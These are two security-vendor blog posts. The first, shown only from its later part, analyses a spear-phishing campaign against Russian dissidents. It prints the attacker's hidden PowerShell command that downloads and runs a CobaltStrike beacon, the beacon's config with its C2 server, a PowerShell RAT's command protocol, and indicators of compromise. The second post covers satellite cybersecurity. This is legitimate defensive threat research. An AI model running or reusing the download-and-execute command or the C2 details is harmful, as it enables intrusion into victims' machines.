Executing this scripts leads to spawning PowerShell to download a CobaltStrike beacon from the remote server and execute it on the victim’s machine. (The deployed CobaltStrike file name is Putty)

"C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" -windowstyle hidden $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe' -OutFile $env:TEMPputty.exe; . $env:TEMPputty.exe; Start-Sleep 15

The following shows the CobaltStrike config:

{
  "BeaconType": [
    "HTTPS"
  ],
  "Port": 443,
  "SleepTime": 38500,
  "MaxGetSize": 1398151,
  "Jitter": 27,
  "C2Server": "wikipedia-book.vote,/async/newtab_ogb",
  "HttpPostUri": "/gen_204",
  "Malleable_C2_Instructions": [
    "Remove 17 bytes from the end",
    "Remove 32 bytes from the beginning",
    "Base64 URL-safe decode"
  ],
  "SpawnTo": "/4jEZLD/DHKDj1CbBvlJIg==",
  "HttpGet_Verb": "GET",
  "HttpPost_Verb": "POST",
  "HttpPostChunk": 96,
  "Spawnto_x86": "%windir%\syswow64\gpupdate.exe",
  "Spawnto_x64": "%windir%\sysnative\gpupdate.exe",
  "CryptoScheme": 0,
  "Proxy_Behavior": "Use IE settings",
  "Watermark": 1432529977,
  "bStageCleanup": "True",
  "bCFGCaution": "True",
  "KillDate": 0,
  "bProcInject_StartRWX": "True",
  "bProcInject_UseRWX": "False",
  "bProcInject_MinAllocSize": 16700,
  "ProcInject_PrependAppend_x86": [
    "kJCQ",
    "Empty"
  ],
  "ProcInject_PrependAppend_x64": [
    "kJCQ",
    "Empty"
  ],
  "ProcInject_Execute": [
    "ntdll.dll:RtlUserThreadStart",
    "SetThreadContext",
    "NtQueueApcThread-s",
    "kernel32.dll:LoadLibraryA",
    "RtlCreateUserThread"
  ],
  "ProcInject_AllocationMethod": "NtMapViewOfSection",
  "bUsesCookies": "True",
  "HostHeader": ""
}

Similar lure used by another actor

We also have identified activity by another actor that uses a similar lure as the one used in the previously mentioned campaign. This activity is potentially related to Carbon Spider and uses “Федеральная служба по надзору в сфере связи, информационных технологий и массовых коммуникаций” (Federal Service for Supervision of Communications, Information Technology and Mass Communications) of Russia as a template. In this case, the threat actor has deployed a PowerShell-based Rat.

The dropped PowerShell script is obfuscated using a combination of Base64 and custom obfuscation.

After deobfuscating the script, you can see the Rat deployed by this actor. This PowerShell based Rat has the capability to get the next stage payload and execute it. The next stage payload can be one of the following file types:

• JavaScript
• PowerShell
• Executable
• DLL

All of Its communications with its server are in Base64 format. This Rat starts its activity by setting up some configurations which include the C2 url, intervals, debug mode and a parameter named group that initialized with “Madagascar” which probably is the alias of the threat actor.

After setting up the configuration, it calls the “Initialize-Engine” function. This function collects the victim’s info including OS info, Username, Hostname, Bios info and also a host-domain value that shows if the machine in a domain member or not. It then appends all the collected into into a string and separate them by “|” character and at the end it add the group name and API config value. The created string is being send to the server using Send-WebInit function. This function adds “INIT%%%” string to the created string and base64 encodes it and sends it to the server.

After performing the initialization, it goes into a loop that keeps calling the “Invoke-Engine” function. This function checks the incoming tasks from the server, decodes them and calls the proper function to execute the incoming task. If there is no task to execute, it sends “GETTASK%%” in Base64 format to its server to show it is ready to get tasks and execute them. The “IC” command is used to delete itself.

The result of the task execution will be send to the server using “PUTTASK%%” command.

Infrastructure

The following shows the infrastructure used by this actor highlighting that the different lures are all connected.

The Malwarebytes Threat Intelligence continues to monitor cyber attacks related to the Ukraine war. We are protecting our customers and sharing additional indicators of compromise.

IOCs

RTF files host domain:
digital-ministry[.]ru
RTF files:
PKH telegram.rtf
b19af42ff8cf0f68e520a88f40ffd76f53a27dffa33b313fe22192813d383e1e
PKH.rtf
38f2b578a9da463f555614e9ca9036337dad0af4e03d89faf09b4227f035db20
MSHTML exploit:
wallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html
4e1304f4589a706c60f1f367d804afecd3e08b08b7d5e6bd8c93384f0917385c
CobaltStrike Download URL:
wallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe
CobaltStrike:
Putty.exe
d4eaf26969848d8027df7c8c638754f55437c0937fbf97d0d24cd20dd92ca66d
CobaltStrike C2:
wikipedia-book[.]vote/async/newtab_ogb
Macro based maldoc:
c7dd490adb297b7f529950778b5a426e8068ea2df58be5d8fd49fe55b5331e28
PowerShell based RAT:
9d4640bde3daf44cc4258eb5f294ca478306aa5268c7d314fc5019cf783041f0
PowerShell Rat C2:
swordoke[.]com

The post New spear phishing campaign targets Russian dissidents appeared first on Malwarebytes Labs.

In the context of this article we will use the term satellite for a machine that is launched into space and moves around Earth. And there might be a lot more of them than you would expect—this live map tracks a huge number of satellites.

Originally most of earth’s satellites were launched for scientific reasons. Some because of their unique ability to provide a view of a large area of the earth’s surface, and others because they are able to study space without having to deal with the atmosphere.

Today, a majority of the satellites in orbit are used in some form of communication. That’s not surprising when you consider that Elon Musk’s SpaceX is by far the largest operator of satellites. In September 2021, the total number of satellites amounted to 4550, with 1655 of them belonging to SpaceX. SpaceX’s Starlink satellite Internet program plans to send more than a thousand new satellites into orbit every year.

Commercial satellites, like Starlink, provide us with the ability to have things like Internet access, television, GPS, and scientific information about the weather and other processes in the atmosphere and on the surface.

CISA

On March 17, 2022, the Cybersecurity & Infrastructure Security Agency (CISA) published an alert in conjunction with the Federal Bureau of Investigation (FBI) which warned of possible threats to US and international satellite communication (SATCOM) networks.

Along with that alert came a report that provided mitigation strategies for SATCOM providers and their customers. And, as part of CISA’s Shields Up initiative, all organizations are being asked to significantly lower their threshold for reporting and sharing indications of malicious cyberactivity.

Russia

On March 2, 2022 the current head of the Russian Roscosmos State Space Corporation, Dmitry Rogozin, said that Russia will consider any cyberattacks targeting Russian satellite infrastructure an act of war. This didn’t seem to stop activist group NB65 from claiming that it had disabled WS02, the Rocosmos Vehicle Monitoring System.

Viasat

On February 28, 2022 US-listed satellite communications firm Viasat Inc said it was investigating a suspected cyberattack that caused a partial outage in its residential broadband services in Ukraine and other European countries. Among other things, the outage caused a disruption of the remote monitoring and control of 5,800 wind turbines in Central Europe, with a total capacity of 11 gigawatt (GW).

Starlink

Viasat operates large geostationary satellites. Geostationary means they are synchronized with the earth’s rotation, which results in a stationary orbit at a point about 35,000 kilometers from Earth.

Viasat’s geostationary approach is the traditional method of providing broadband service from space, but other operators, like Starlink, use satellites in low earth orbits. This requires more satellites, but provides higher speeds.

In answer to a request for Starlink support from Ukraine digital minister Mykhailo Fedorov, SpaceX’s CEO Elon Musk was quick to respond and promise help.

Critical infrastructure

The examples above demonstrate how networks of satellites and space systems are vulnerable to cyberattack, and create a backdoor into the physical and digital systems we rely upon on a daily basis.

While we tend to think about other things first when we are discussing critical infrastructure, the underlying systems that enable technology functionality across these sectors often rely on space systems. For example, some high-tech farming equipment relies on GPS information provided by satellite.

Like so many other important assets, a lot of space systems were developed without cybersecurity in mind. Around the turn of the century, cybersecurity was not a big concern, and during the development of some systems no special cybersecurity parameters were deployed because engineers thought the technology was too advanced for a hacker to compromise.

It wasn’t until NASA set up the Cyber Defense Engineering and Research Group (CDER) that anyone looked at the unique cybersecurity requirements that distinguishes space mission systems from traditional firewalled data servers.

And it wasn’t until the end of 2016, that AT&T encrypted NASA’s Deep Space Network (DSN), after a report on how to hack into the Mars Rover appeared on the Internet.

Recommendations

If you know or suspect that an important part of your organization’s internal processes depends on satellite services, the CISA report provides some guidelines for customers of SATCOM providers:

• Use secure methods for authentication.
• Enforce principle of least privilege through authorization policies.
• Review existing trust relationships with IT service providers.
• Implement independent encryption across all communications links leased from, or provided by, your SATCOM provider.
• Strengthen the security of operating systems, software, and firmware, including vulnerability and patch management.
• Monitor network logs for suspicious activity and unauthorized or unusual login attempts.
• Create, maintain, and exercise a cyberincident response plan, resilience plan, and continuity of operations plan so that critical functions and operations can be kept running if technology systems—including SATCOM networks—are disrupted or need to be taken offline.

Stay safe, everyone!

The post Satellites are critical infrastructure and need to be cybersecured appeared first on Malwarebytes Labs.